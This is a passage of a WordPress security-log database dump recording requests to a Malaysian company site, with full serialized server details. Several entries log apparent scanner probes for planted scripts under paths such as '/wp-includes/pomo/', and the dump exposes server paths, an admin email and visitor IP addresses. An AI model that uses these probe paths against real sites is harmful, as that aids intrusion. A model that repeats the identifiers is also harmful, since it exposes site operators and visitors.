Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"60423\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZlLo4UY8eGcCNBrto1fGQAAAQ8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570327459.3915\";s:12:\"REQUEST_TIME\";s:10:\"1570327459\";}}','notice','2019-10-06 02:04:22','2019-10-06 02:04:19',35414736,37223064,'https://bintara.com.my/?page_id=18',1,0,'137.74.4.69'),(27564,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:68:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:29:\"/wp-includes/pomo/wp-info.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"280-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"280-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"280-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:51:\"https://bintara.com.my/wp-includes/pomo/wp-info.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:29:\"/wp-includes/pomo/wp-info.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZlG84UY8eGcCNBrto1dQQAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:51:\"https://bintara.com.my/wp-includes/pomo/wp-info.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:29:\"/wp-includes/pomo/wp-info.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZlG84UY8eGcCNBrto1dQQAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"69.16.254.65\";s:11:\"REMOTE_PORT\";s:5:\"41322\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:51:\"https://bintara.com.my/wp-includes/pomo/wp-info.php\";s:10:\"SCRIPT_URL\";s:29:\"/wp-includes/pomo/wp-info.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZlG84UY8eGcCNBrto1dQQAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570326259.5409\";s:12:\"REQUEST_TIME\";s:10:\"1570326259\";}}','notice','2019-10-06 01:44:21','2019-10-06 01:44:19',35054152,36862296,'https://bintara.com.my/wp-includes/pomo/wp-info.php',1,0,'69.16.254.65'),(27555,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:53:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/general/popup-pomo.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/general/popup-pomo.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:23:\"/general/popup-pomo.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZkELhIkVaLRYqSs9rf3SQAAABM\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/general/popup-pomo.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:23:\"/general/popup-pomo.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZkELhIkVaLRYqSs9rf3SQAAABM\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/general/popup-pomo.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/general/popup-pomo.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZkELhIkVaLRYqSs9rf3SQAAABM\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"118.178.192.107\";s:11:\"REMOTE_PORT\";s:5:\"40378\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/general/popup-pomo.php\";s:10:\"SCRIPT_URL\";s:23:\"/general/popup-pomo.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZkELhIkVaLRYqSs9rf3SQAAABM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570309166.7091\";s:12:\"REQUEST_TIME\";s:10:\"1570309166\";}}','notice','2019-10-05 20:59:34','2019-10-05 20:59:27',35526512,37321824,'https://bintara.com.my/general/popup-pomo.php',1,0,'118.178.192.107'),(27556,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/D3117A87\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"23.231.37.183\";s:11:\"REMOTE_PORT\";s:5:\"36753\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZkKIhIkVaLRYqSs9rf3xwAAAAs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570310691.0586\";s:12:\"REQUEST_TIME\";s:10:\"1570310691\";}}','notice','2019-10-05 21:24:53','2019-10-05 21:24:51',35423400,37223504,'https://bintara.com.my/?page_id=18',1,0,'23.231.37.183'),(27557,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/ads.txt\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:14:\"adstxt.com/1.2\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/ads.txt\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/ads.txt\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZkLXBIkVaLRYqSs9rf32QAAAAE\";s:12:\"REDIRECT_URL\";s:8:\"/ads.txt\";s:11:\"REMOTE_ADDR\";s:14:\"34.219.173.231\";s:11:\"REMOTE_PORT\";s:5:\"58518\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"https://bintara.com.my/ads.txt\";s:10:\"SCRIPT_URL\";s:8:\"/ads.txt\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZkLXBIkVaLRYqSs9rf32QAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570311004.4128\";s:12:\"REQUEST_TIME\";s:10:\"1570311004\";}}','notice','2019-10-05 21:30:07','2019-10-05 21:30:04',35430424,37243704,'https://bintara.com.my/ads.txt',1,0,'34.219.173.231'),(27558,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:149:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fbespoke-glass-furniture-uv-bonded-products%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:88:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:147:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fbespoke-glass-furniture-uv-bonded-products%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"63473\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZkeIi82ximopEFXXu4OZAAAAM8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570315810.7258\";s:12:\"REQUEST_TIME\";s:10:\"1570315810\";}}','notice','2019-10-05 22:50:12','2019-10-05 22:50:11',35027808,36837976,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fbespoke-glass-furniture-uv-bonded-products%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(27559,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:88:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"63650\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZkeJy82ximopEFXXu4OagAAAMg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570315815.983\";s:12:\"REQUEST_TIME\";s:10:\"1570315815\";}}','notice','2019-10-05 22:50:17','2019-10-05 22:50:16',35026032,36831704,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(27560,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"108.161.136.178\";s:11:\"REMOTE_PORT\";s:5:\"55891\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZkmuhIkVaLRYqSs9rf6EQAAAAY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570318011.0506\";s:12:\"REQUEST_TIME\";s:10:\"1570318011\";}}','notice','2019-10-05 23:26:53','2019-10-05 23:26:51',35505384,37321888,'https://bintara.com.my/?page_id=18',1,0,'108.161.136.178'),(27561,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"6123D550-DB3B-4220-BBBC-DF80CF53E8F8\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZkp@PaSoa86rX5HNFO5ngAAAEs\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:12:\"60.54.90.164\";s:11:\"REMOTE_PORT\";s:5:\"17586\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDis